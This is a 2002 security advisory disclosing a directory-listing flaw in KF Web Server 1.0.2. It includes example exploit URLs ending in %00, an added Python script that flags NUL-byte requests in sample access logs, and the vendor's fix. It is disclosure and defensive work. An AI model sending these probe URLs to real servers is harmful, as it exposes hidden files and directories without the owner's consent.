From: Securiteinfo.com (webmastersecuriteinfo.com)
Date: Sun Jul 07 2002 - 14:42:47 CDT

    KF Web Server version 1.0.2 shows file and directory content

    .oO Overview Oo.
    KF Web Server version 1.0.2 shows file and directory content
    Discovered on 2002, July, 2nd
    Vendor: KeyFocus (http://www.keyfocus.net/kfws/)

    KF Web Server 1.0.2 is a free personal web server available for Windows
    98, ME, 2000 and XP. This web server can show file and directory content.

    .oO Details Oo.
    If the requested URL contains a %00 after a directory name, the server
    lists every file in that directory.
    A hacker can see all hidden (non-HTML linked) files and directories on the

    .oO Exploit Oo.
    The exploit is really easy. You can do it with any browser.
    Examples:
    http://server_name/index.html : Normal use.
    http://server_name/%00 : You get the vulnerability.
    http://server_name/index.html%00 : Is *not* vulnerable.
    http://server_name/%00index.html : You get the vulnerability. In fact,
    everything after %00 is ignored.
    http://server_name/subdir/%00 : You get the vulnerability.
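    The behaviour described above (the server decodes %00 to a NUL byte and drops everything after it, so a path that ends up naming a directory gets listed) is easy to spot in access logs. The following detection script is an added example written for this page; it is not code from the advisory or from KeyFocus. The log lines, client addresses and the Common Log Format layout are constructed for the example. It flags every request whose path decodes to contain a NUL byte and shows the path a NUL-truncating server would actually resolve, which is what decides whether a listing is returned. Note that it also flags index.html%00, which the advisory says is not exploitable, because a request carrying a NUL byte is worth investigating whatever it resolved to. A double-encoded %2500 decodes only to the literal text "%00" after one round of decoding and is therefore not flagged.

```python
import re
from urllib.parse import unquote_to_bytes

# Constructed sample access-log lines in Common Log Format (not real data
# from the advisory; addresses are from the 192.0.2.0/24 documentation range).
SAMPLE_LOG = """\
192.0.2.10 - - [07/Jul/2002:14:42:47 -0500] "GET /index.html HTTP/1.0" 200 1234
192.0.2.11 - - [07/Jul/2002:14:43:01 -0500] "GET /%00 HTTP/1.0" 200 5678
192.0.2.11 - - [07/Jul/2002:14:43:05 -0500] "GET /subdir/%00 HTTP/1.0" 200 910
192.0.2.12 - - [07/Jul/2002:14:44:10 -0500] "GET /%00index.html HTTP/1.0" 200 5678
192.0.2.13 - - [07/Jul/2002:14:45:00 -0500] "GET /index.html%00 HTTP/1.0" 404 0
192.0.2.14 - - [07/Jul/2002:14:46:00 -0500] "GET /%2500.html HTTP/1.0" 404 0
"""

# Pulls method, request target and status code out of a CLF line.
REQUEST_RE = re.compile(
    r'"(?P<method>[A-Z]+) (?P<target>\S+) HTTP/\d\.\d" (?P<status>\d{3})'
)


def _path_bytes(target: str) -> bytes:
    """Percent-decode the path part of a request target exactly once,
    the way a web server would before mapping it to the filesystem."""
    path = target.split("?", 1)[0]
    return unquote_to_bytes(path)


def contains_null_byte(target: str) -> bool:
    """True if the request target decodes to a path containing a NUL byte."""
    return b"\x00" in _path_bytes(target)


def truncated_path(target: str) -> str:
    """The path a NUL-truncating server resolves: everything from the first
    NUL byte onward is discarded, so /%00index.html becomes / and
    /subdir/%00 becomes /subdir/ (both directories)."""
    raw = _path_bytes(target)
    return raw.split(b"\x00", 1)[0].decode("latin-1")


def scan_access_log(text: str) -> list:
    """Return one finding per request whose path carries an encoded NUL byte."""
    findings = []
    for line in text.splitlines():
        m = REQUEST_RE.search(line)
        if not m:
            continue  # not a request line we understand; skip it
        target = m.group("target")
        if contains_null_byte(target):
            findings.append({
                "client": line.split(" ", 1)[0],
                "target": target,
                "served_as": truncated_path(target),
                "status": int(m.group("status")),
            })
    return findings


if __name__ == "__main__":
    for f in scan_access_log(SAMPLE_LOG):
        print(f"{f['client']} requested {f['target']!r}, "
              f"server would resolve {f['served_as']!r} (status {f['status']})")
```

    On the sample log this reports four requests: the three the advisory lists as vulnerable, each resolving to a directory, plus the index.html%00 probe that resolves to a file. The same `contains_null_byte` check, applied to the decoded path before it is handed to the filesystem, is the server-side fix: reject the request instead of letting the C string truncation decide what gets served.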

    .oO Solution Oo.
    The vendor has been informed and has solved the problem.
    Upgrade to KF Web Server version 1.0.3.

    .oO Discovered by Oo.
    Arnaud Jacques aka scrap